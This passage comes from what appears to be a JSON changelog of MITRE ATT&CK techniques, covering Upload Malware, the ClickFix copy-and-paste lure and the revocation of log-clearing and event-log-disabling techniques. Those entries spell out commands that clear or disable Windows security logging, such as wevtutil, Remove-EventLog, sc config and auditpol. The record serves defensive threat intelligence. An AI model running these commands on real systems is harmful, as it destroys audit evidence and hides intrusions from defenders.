nowrap=\"nowrap\">can&nbsp;also&nbsp;be&nbsp;staged&nbsp;on&nbsp;web&nbsp;services,&nbsp;such&nbsp;as&nbsp;GitHub&nbsp;or&nbsp;Pasteb</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">in;&nbsp;hosted&nbsp;on&nbsp;the&nbsp;InterPlanetary&nbsp;File&nbsp;System&nbsp;(IPFS),&nbsp;where&nbsp;d</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">in;&nbsp;hosted&nbsp;on&nbsp;the&nbsp;InterPlanetary&nbsp;File&nbsp;System&nbsp;(IPFS),&nbsp;where&nbsp;d</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ecentralized&nbsp;content&nbsp;storage&nbsp;makes&nbsp;the&nbsp;removal&nbsp;of&nbsp;malicious&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ecentralized&nbsp;content&nbsp;storage&nbsp;makes&nbsp;the&nbsp;removal&nbsp;of&nbsp;malicious&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">files&nbsp;difficult;&nbsp;or&nbsp;saved&nbsp;on&nbsp;the&nbsp;blockchain&nbsp;as&nbsp;smart&nbsp;contrac</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">files&nbsp;difficult;&nbsp;or&nbsp;saved&nbsp;on&nbsp;the&nbsp;blockchain&nbsp;as&nbsp;smart&nbsp;contrac</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ts,&nbsp;which&nbsp;are&nbsp;resilient&nbsp;against&nbsp;takedowns&nbsp;that&nbsp;would&nbsp;affect&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ts,&nbsp;which&nbsp;are&nbsp;resilient&nbsp;against&nbsp;takedowns&nbsp;that&nbsp;would&nbsp;affect&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">traditional&nbsp;infrastructure.(Citation:&nbsp;Volexity&nbsp;Ocean&nbsp;Lotus&nbsp;N</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">traditional&nbsp;infrastructure.(Citation:&nbsp;Volexity&nbsp;Ocean&nbsp;Lotus&nbsp;N</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ovember&nbsp;2020)(Citation:&nbsp;Talos&nbsp;IPFS&nbsp;2022)(Citation:&nbsp;Guardio&nbsp;E</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ovember&nbsp;2020)(Citation:&nbsp;Talos&nbsp;IPFS&nbsp;2022)(Citation:&nbsp;Guardio&nbsp;E</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">therhiding&nbsp;2023)(Citation:&nbsp;Bleeping&nbsp;Computer&nbsp;Binance&nbsp;Smart&nbsp;C</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">therhiding&nbsp;2023)(Citation:&nbsp;Bleeping&nbsp;Computer&nbsp;Binance&nbsp;Smart&nbsp;C</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hain&nbsp;2023)&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;upload&nbsp;backdoored&nbsp;files,&nbsp;such&nbsp;as</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hain&nbsp;2023)&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;upload&nbsp;backdoored&nbsp;files,&nbsp;such&nbsp;as</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;software&nbsp;packages,&nbsp;application&nbsp;binaries,&nbsp;virtual&nbsp;machine&nbsp;im</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;software&nbsp;packages,&nbsp;application&nbsp;binaries,&nbsp;virtual&nbsp;machine&nbsp;im</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ages,&nbsp;or&nbsp;container&nbsp;images,&nbsp;to&nbsp;third-party&nbsp;software&nbsp;stores,&nbsp;p</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ages,&nbsp;or&nbsp;container&nbsp;images,&nbsp;to&nbsp;third-party&nbsp;software&nbsp;stores,&nbsp;p</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ackage&nbsp;libraries,&nbsp;extension&nbsp;marketplaces,&nbsp;or&nbsp;repositories&nbsp;(e</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ackage&nbsp;libraries,&nbsp;extension&nbsp;marketplaces,&nbsp;or&nbsp;repositories&nbsp;(e</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">x:&nbsp;GitHub,&nbsp;CNET,&nbsp;AWS&nbsp;Community&nbsp;AMIs,&nbsp;Docker&nbsp;Hub,&nbsp;PyPi,&nbsp;NPM).</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">x:&nbsp;GitHub,&nbsp;CNET,&nbsp;AWS&nbsp;Community&nbsp;AMIs,&nbsp;Docker&nbsp;Hub,&nbsp;PyPi,&nbsp;NPM).</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(Citation:&nbsp;Datadog&nbsp;Security&nbsp;Labs&nbsp;Malicious&nbsp;PyPi&nbsp;Packages&nbsp;202</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(Citation:&nbsp;Datadog&nbsp;Security&nbsp;Labs&nbsp;Malicious&nbsp;PyPi&nbsp;Packages&nbsp;202</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">4)&nbsp;By&nbsp;chance&nbsp;encounter,&nbsp;victims&nbsp;may&nbsp;directly&nbsp;download/instal</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">4)&nbsp;By&nbsp;chance&nbsp;encounter,&nbsp;victims&nbsp;may&nbsp;directly&nbsp;download/instal</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">l&nbsp;these&nbsp;backdoored&nbsp;files&nbsp;via&nbsp;[User&nbsp;Execution](https://attack</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">l&nbsp;these&nbsp;backdoored&nbsp;files&nbsp;via&nbsp;[User&nbsp;Execution](https://attack</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.mitre.org/techniques/T1204).&nbsp;Masquerading,&nbsp;including&nbsp;typo<span class=\"diff_sub\">-</span>s</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.mitre.org/techniques/T1204).&nbsp;Masquerading,&nbsp;including&nbsp;typosq</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">quatting&nbsp;legitimate&nbsp;software,&nbsp;may&nbsp;increase&nbsp;the&nbsp;chance&nbsp;of&nbsp;use</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uatting&nbsp;legitimate&nbsp;software,&nbsp;may&nbsp;increase&nbsp;the&nbsp;chance&nbsp;of&nbsp;user</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rs&nbsp;mistakenly&nbsp;executing&nbsp;these&nbsp;files.&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;mistakenly&nbsp;executing&nbsp;these&nbsp;files.&nbsp;</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1056: Pre-compromise"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0824: Detection of Upload Malware"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--e261a979-f354-41a8-963e-6cadac27c4bf",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-03-18 12:57:50.188000+00:00",
                    "modified": "2026-03-27 20:05:57.921000+00:00",
                    "name": "Malicious Copy and Paste",
                    "description": "An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). One such strategy is \"ClickFix,\" in which adversaries present users with seemingly helpful solutions\u2014such as prompts to fix errors or complete CAPTCHAs\u2014that instead instruct the user to copy and paste malicious code.\n\nMalicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citation: AhnLab LummaC2 2025)\n\nAdversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution, consistent with the \"ClickFix\" strategy.(Citation: Proofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Paste 2024)\n\nTricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1204/004",
                            "external_id": "T1204.004"
                        },
                        {
                            "source_name": "AhnLab Malicioys Copy Paste 2024",
                            "description": "AhnLab SEcurity intelligence Center. (2024, May 23). Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V). Retrieved April 23, 2025.",
                            "url": "https://asec.ahnlab.com/en/73952/"
                        },
                        {
                            "source_name": "AhnLab LummaC2 2025",
                            "description": "AhnLab SEcurity intelligence Center. (2025, January 8). Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page. Retrieved April 23, 2025.",
                            "url": "https://asec.ahnlab.com/en/85699/"
                        },
                        {
                            "source_name": "Reliaquest CAPTCHA 2024",
                            "description": "Alex Capraro. (2024, December 17). Using CAPTCHA for Compromise: Hackers Flip the Script. Retrieved March 18, 2025.",
                            "url": "https://www.reliaquest.com/blog/using-captcha-for-compromise/"
                        },
                        {
                            "source_name": "Sekoia ClickFake 2025",
                            "description": "Amaury G., Coline Chavane, Felix Aim\u00e9 and Sekoia TDR. (2025, March 31). From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic. Retrieved April 1, 2025.",
                            "url": "https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/"
                        },
                        {
                            "source_name": "CloudSEK Lumma Stealer 2024",
                            "description": "CloudSEK TRIAD. (2024, September 19). Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages. Retrieved March 18, 2025.",
                            "url": "https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages"
                        },
                        {
                            "source_name": "Proofpoint ClickFix 2024",
                            "description": "Tommy Madjar, Selena Larson and The Proofpoint Threat Research Team. (2024, November 18). Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape. Retrieved March 18, 2025.",
                            "url": "https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Ale Houspanossian",
                        "Fernando Bacchin",
                        "Gabriel Currie",
                        "Harikrishnan Muthu, Cyble",
                        "Menachem Goldstein",
                        "ReliaQuest",
                        "SeungYoul Yoo, AhnLab"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-27 20:05:57.921000+00:00\", \"old_value\": \"2025-10-05 17:30:01.834000+00:00\"}, \"root['x_mitre_contributors'][6]\": {\"new_value\": \"SeungYoul Yoo, AhnLab\", \"old_value\": \"SeungYoul Yoo, Ahn Lab\"}}}",
                    "previous_version": "1.1",
                    "changelog_mitigations": {
                        "shared": [
                            "M1021: Restrict Web-Based Content",
                            "M1031: Network Intrusion Prevention",
                            "M1038: Execution Prevention"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0340: User Execution \u2013 Malicious Copy & Paste (browser/email \u2192 shell with obfuscated one-liner) \u2013 T1204.004"
                        ],
                        "new": [],
                        "dropped": []
                    }
                }
            ],
            "revocations": [
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-28 17:11:54.034000+00:00",
                    "modified": "2026-04-14 22:54:50.786000+00:00",
                    "name": "Clear Linux or Mac System Logs",
                    "description": "Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)\n\n* <code>/var/log/messages:</code>: General and system-related messages\n* <code>/var/log/secure</code> or <code>/var/log/auth.log</code>: Authentication logs\n* <code>/var/log/utmp</code> or <code>/var/log/wtmp</code>: Login records\n* <code>/var/log/kern.log</code>: Kernel logs\n* <code>/var/log/cron.log</code>: Crond logs\n* <code>/var/log/maillog</code>: Mail server logs\n* <code>/var/log/httpd/</code>: Web server access and error logs\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1070/002",
                            "external_id": "T1070.002"
                        },
                        {
                            "source_name": "Linux Logs",
                            "description": "Marcel. (2018, April 19). 12 Critical Linux Log Files You Must be Monitoring. Retrieved March 29, 2020.",
                            "url": "https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:50.786000+00:00\", \"old_value\": \"2025-10-24 17:48:34.441000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--5e29d64d-2b14-4f92-875e-4c9c498e213c",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:54:04.240000+00:00",
                        "modified": "2026-04-22 15:41:39.190000+00:00",
                        "name": "Clear Linux or Mac System Logs",
                        "description": "Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the `/var/log/` directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)\n\n* `/var/log/messages:`: General and system-related messages\n* `/var/log/secure or /var/log/auth.log`: Authentication logs\n* `/var/log/utmp or /var/log/wtmp`: Login records\n* `/var/log/kern.log`: Kernel logs\n* `/var/log/cron.log`: Crond logs\n* `/var/log/maillog`: Mail server logs\n* `/var/log/httpd/`: Web server access and error logs",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "defense-impairment"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1685/006",
                                "external_id": "T1685.006"
                            },
                            {
                                "source_name": "Linux Logs",
                                "description": "Marcel. (2018, April 19). 12 Critical Linux Log Files You Must be Monitoring. Retrieved March 29, 2020.",
                                "url": "https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "Linux",
                            "macOS"
                        ],
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-28 17:05:14.707000+00:00",
                    "modified": "2026-04-14 22:54:48.496000+00:00",
                    "name": "Clear Windows Event Logs",
                    "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\n\nWith administrator privileges, the event logs can be cleared with the following utility commands:\n\n* <code>wevtutil cl system</code>\n* <code>wevtutil cl application</code>\n* <code>wevtutil cl security</code>\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command <code>Remove-EventLog -LogName Security</code> to delete the Security EventLog and after reboot, disable future logging.  Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)\n\nAdversaries may also attempt to clear logs by directly deleting the stored log files within `C:\\Windows\\System32\\winevt\\logs\\`.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1070/001",
                            "external_id": "T1070.001"
                        },
                        {
                            "source_name": "disable_win_evt_logging",
                            "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.",
                            "url": "https://ptylu.github.io/content/report/report.html?report=25"
                        },
                        {
                            "source_name": "Microsoft Clear-EventLog",
                            "description": "Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018.",
                            "url": "https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog"
                        },
                        {
                            "source_name": "Microsoft EventLog.Clear",
                            "description": "Microsoft. (n.d.). EventLog.Clear Method (). Retrieved July 2, 2018.",
                            "url": "https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx"
                        },
                        {
                            "source_name": "Microsoft wevtutil Oct 2017",
                            "description": "Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018.",
                            "url": "https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_contributors": [
                        "Lucas Heiligenstein"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.5",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:48.496000+00:00\", \"old_value\": \"2025-10-24 17:48:52.287000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--75b9a4d2-d4e2-4ca1-9aab-1badd9e05fd0",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:54:03.796000+00:00",
                        "modified": "2026-04-22 15:41:59.512000+00:00",
                        "name": "Clear Windows Event Logs",
                        "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\nWith administrator privileges, the event logs can be cleared with the following utility commands:\n\n* `wevtutil cl system`\n* `wevtutil cl application`\n* `wevtutil cl security`\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command `Remove-EventLog -LogName Security` to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)\n\nAdversaries may also attempt to clear logs by directly deleting the stored log files within `C:\\Windows\\System32\\winevt\\logs\\`.",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "defense-impairment"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1685/005",
                                "external_id": "T1685.005"
                            },
                            {
                                "source_name": "disable_win_evt_logging",
                                "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.",
                                "url": "https://ptylu.github.io/content/report/report.html?report=25"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_contributors": [
                            "Lucas Heiligenstein"
                        ],
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "Windows"
                        ],
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-21 20:46:36.688000+00:00",
                    "modified": "2026-04-14 22:54:40.108000+00:00",
                    "name": "Disable Windows Event Logging",
                    "description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\n\nThe EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to <code>Security Settings\\Local Policies\\Audit Policy</code> for basic audit policy settings or <code>Security Settings\\Advanced Audit Policy Configuration</code> for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) <code>auditpol.exe</code> may also be used to set audit policies.(Citation: auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the <code>Set-Service -Name EventLog -Status Stopped</code> or <code>sc config eventlog start=disabled</code> commands (followed by manually stopping the service using <code>Stop-Service  -Name EventLog</code>).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the \u201cStart\u201d value in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog</code> then restarting the system for the change to take effect.(Citation: disable_win_evt_logging)\n\nThere are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the \"Start\" value in the key <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Security</code>, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System</code> and <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application</code> to disable the entire EventLog.(Citation: disable_win_evt_logging)\n\nAdditionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:\u201dAccount Logon\u201d /success:disable /failure:disable</code> turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.(Citation: T1562.002_redcanaryco)\n\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1562/002",
                            "external_id": "T1562.002"
                        },
                        {
                            "source_name": "Disable_Win_Event_Logging",
                            "description": " dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.",
                            "url": "https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging"
                        },
                        {
                            "source_name": "def_ev_win_event_logging",
                            "description": "Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.",
                            "url": "https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/"
                        },
                        {
                            "source_name": "EventLog_Core_Technologies",
                            "description": "Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.",
                            "url": "https://www.coretechnologies.com/blog/windows-services/eventlog/"
                        },
                        {
                            "source_name": "Audit_Policy_Microsoft",
                            "description": "Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021.",
                            "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy"
                        },
                        {
                            "source_name": "Windows Log Events",
                            "description": "Franklin Smith. (n.d.). Windows Security Log Events. Retrieved February 21, 2020.",
                            "url": "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/"
                        },
                        {
                            "source_name": "disable_win_evt_logging",
                            "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.",
                            "url": "https://ptylu.github.io/content/report/report.html?report=25"
                        },
                        {
                            "source_name": "auditpol",
                            "description": "Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021.",
                            "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol"
                        },
                        {
                            "source_name": "winser19_file_overwrite_bug_twitter",
                            "description": "Naceri, A. (2021, November 7). Windows Server 2019 file overwrite bug. Retrieved April 7, 2022.",
                            "url": "https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040"
                        },
                        {
                            "source_name": "T1562.002_redcanaryco",
                            "description": "redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.",
